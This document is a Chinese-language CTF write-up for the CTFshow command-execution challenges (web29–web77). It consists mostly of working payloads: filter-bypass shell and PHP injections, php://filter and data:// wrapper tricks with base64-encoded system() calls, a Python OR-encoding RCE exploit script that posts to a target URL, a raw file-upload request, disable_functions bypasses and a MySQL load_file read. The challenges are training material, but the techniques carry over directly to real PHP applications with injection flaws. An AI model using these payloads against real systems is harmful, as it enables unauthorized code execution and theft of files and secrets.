CTFSHOW命令执行
web29
过滤了flag
payload:
随便写几个姿势
/?c=system("nl fl??????");
/?c=system("nl fl*");
/?c=system("nl fla''g.php");
/?c=echo `nl fla""g.php`;
/?c=echo `nl fla\g.php`;
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=eval($_GET[1]);&1=system('nl flag.php');
剩下的我不会了
##web30
过滤了flag|system|php
用echo 反引号来执行命令
payload:
/?c=echo `nl fla""g.p""hp`;
/?c=echo `nl fla?????`;
/?c=echo `nl f*`;
/?c=eval($_GET[1]);&1=system('nl flag.php');
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
web31
过滤了flag|system|php|cat|sort|shell|\.| |
没关系,我们有都是姿势
payload:
/?c=highlight_file(next(array_reverse(scandir(dirname(__FILE__)))));
/?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
##web32
include不用括号,分号可以用?>代替。
payload:
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
web33-36
payload:
/?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php
/?c=include$_GET[1]?>&1=data://text/plain,<?php system("cat flag.php");?>
/?c=include$_GET[1]?>&1=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
web37
<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
payload:
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
/?c=data://text/palin,<?php system("nl fla*");?>
web38
过滤了flag
payload:
/?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web39
payload:
/?c=data://text/palin,<?php%20system("nl%20f*");?>
web40
理论上是异或
然后我懒
贴exp:
import re
content = ''
preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/'
for i in range(256):
for j in range(256):
if not (re.match(preg,chr(i),re.I) or re.match(preg,chr(j),re.I)):
k = i | j
if k>=32 and k<=126:
a = '%' + hex(i)[2:].zfill(2)
b = '%' + hex(j)[2:].zfill(2)
content += (chr(k) + ' '+ a + ' ' + b + '\n')
f = open('rce_or.txt', 'w')
f.write(content)
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php") #没有将php写入环境变量需手动运行
if(len(argv)!=2):
print("="*50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("="*50)
exit(0)
url=argv[1]
def action(arg):
s1=""
s2=""
for i in arg:
f=open("rce_or.txt","r")
while True:
t=f.readline()
if t=="":
break
if t[0]==i:
#print(i)
s1+=t[2:5]
s2+=t[6:9]
break
f.close()
output="(\""+s1+"\"|\""+s2+"\")"
return(output)
while True:
param=action(input("\n[+] your function:") )+action(input("[+] your command:"))
data={
'c':urllib.parse.unquote(param)
}
r=requests.post(url,data=data)
print("\n[*] result:\n"+r.text)
web41
payload:
/?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
web42
/dev/null 2>&1,让所有的输出流(包括错误的和正确的)都定向到空设备丢弃
%0a
、%26
、||
截断
payload:
/?c=nl%20*%0a
= =姿势就不写那么多了
截断后看过滤自由发挥
web43
过滤了;|cat
payload:
/?c=nl%20*%0a
web44
多过滤了个flag
通配符搞定
payload:
/?c=nl%20*%0a
web45
空格被过滤了
payload:
/?c=nl$IFS*%0a
web46-49
过滤了\;|cat|flag| |[0-9]|\\$|\*/
payload:
/?c=nl%09fla\g.php||
/?c=nl%09fla\g.php%0a
/?c=nl%09fla''g.php%0a
/?c=nl%09fla""g.php%0a
/?c=vi%09fla\g.php%0a
/?c=tac%09fla\g.php%0a
/?c=uniq%09fla\g.php%0a
/?c=nl<fla''g.php||
/?c=nl%09fla\g.php%26
web50-51
payload:
/?c=nl<fla%27%27g.php||
web52
payload:
/?c=nl${IFS}/fl""ag%0a
web53
payload:
/?c=nl${IFS}fla%''g.p''hp
/?c=ca''t${IFS}fl??????
/?c=ca''t${IFS}fl''ag.p''hp
应该还有其他姿势
web54
payload:
/?c=mv${IFS}fla?.php${IFS}t.tx''t
爷给他改个名
/?c=/bin/?at${IFS}f???????
web55
= = 只能是数字
对不起骚套路开始
payload:
/?c=/???/????64+????.???
web56
数据包:
POST /?c=.+/???/????????[@-[] HTTP/1.1
Host: 6595d4e2-edc5-4ff4-a08b-c93d2f563732.challenge.ctf.show:8080
Content-Length: 329
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydZeuVbMPZVcyvpNM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream
#!/bin/sh
cat /var/www/html/flag.php
------WebKitFormBoundarydZeuVbMPZVcyvpNM
Content-Disposition: form-data; name="submit"
111
------WebKitFormBoundarydZeuVbMPZVcyvpNM--
##web58
凑36
-37取反=36
payload:
$((~$(($((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))$((~$((${_}))))))))
##web59
绕过disable_functions
我只想到一种
file
可以把文件读取到一个数组,再打印出来
payload:
c=var_dump(file('flag.php'));
c=highlight_file("flag.php");
c=show_source('flag.php');
##web60-65
payload:
c=highlight_file("flag.php");
c=show_source('flag.php');
web66
payload:
c=var_dump(scandir("/"));
扫描到flag 是txt
然后日他妈的
c=highlight_file('/flag.txt');
web67-70
= = 好家伙
ban的真多
payload:
c=include('/flag.txt');
c=require('/flag.txt');
c=require_once('/flag.txt');
web71
ob_get_contents — 返回输出缓冲区的内容 ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲
此函数丢弃最顶层输出缓冲区的内容并关闭这个缓冲区。如果想要进一步处理缓冲区的内容,必须在ob_end_clean()**之前调用ob_get_contents(),因为当调用ob_end_clean()**时缓冲区内容将被丢弃。
payload:
c=include('/flag.txt');;exit();
web72
看一下y4的blog就可以了= = payload不贴了 太长了。
##web73
c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>
看一下目录
然后
payload:
c=include('/flagc.txt');exit();
web74
同73题
web75-76
扫目录
c=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');}exit(0);
mysql load_file读文件
c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);
##web77
不是很清楚这个题怎么做
但是我复现了一下